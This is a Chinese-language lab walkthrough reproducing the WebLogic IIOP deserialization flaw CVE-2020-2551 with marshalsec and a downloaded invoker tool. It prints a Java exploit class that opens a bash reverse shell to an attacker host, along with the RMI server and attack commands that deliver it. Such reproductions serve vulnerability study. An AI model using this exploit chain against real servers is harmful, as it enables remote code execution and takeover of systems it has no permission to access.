漏洞简介
weblogic 反序列化 (CVE-2020-2551)漏洞是基于IIOP协议执行远程代码进行利用。
启动服务
http://192.168.5.128:10710/console/login/LoginForm.jsp
首先打开此连接,初始化weblogic服务。
准备工具
exp-自己写一个即可.
javac exp.java -source 1.6 -target 1.6
(此处指定编译的class文件的jdk版本。)
marshalsec-0.0.3-SNAPSHOT-all.jar
weblogic20202551.jar(该工具可以下载打包好的,也可以是自行打包,但需要指定weblogic的jdk与编译环境的jdk版本一致。否则会在使用时出现问题。)
weblogic20202551工具主要是用来iiop协议的调用。
首先marshalsec工具主要是利用rmi协议(可以直接在github上下载,也可以自己自行编译,下载后指定编译环境jdk1.8,然后使用mvn clean package -DskipTests,会在target目录下生成marshalsec.jar工具)。
在此期间,我尝试了使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具,但并没有成功,后来发现这是由于jdk版本的问题,需要低版本的jdk生成exp。而JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具生成的最低的exp版本为jdk1.7。但我们需要的是jdk1.6的。
漏洞复现
生成exp
exp如下:
import java.io.IOException;
public class exp_jndi {
static{
try {
java.lang.Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.5.129/4444 0>&1"});
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
}
}
原本想着使用netcat反弹shell,后来发现vulfocus这个环境中的netcat版本可能是比较老的版本,-e参数无法使用😅
开启http服务
指定rmi服务开放端口,并设置rmi转发exp地址。
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.5.129/#exp_jndi" 1099
开启nc等待
使用weblogic20202551.jar 工具,指定rmi地址。
java -jar weblogic20202551.jar 192.168.5.128 10710 rmi://192.168.5.129:1099/exp_jndi
getshell
参考链接
marshalsec下载链接: https://github.com/mbechler/marshalsec
marshalsec jar版本下载链接https://github.com/RandomRobbieBF/marshalsec-jar
weblogic cve-2020-2551工具jar下载地址:https://github.com/zzwlpx/weblogicPoc/releases/tag/1.0
Weblogic CVE-2020-2551漏洞复现&CS实战利用:https://cloud.tencent.com/developer/article/1768466
Weblogic IIOP反序列化漏洞(CVE-2020-2551) 漏洞复现:juejin.cn/post/7219237666486239293
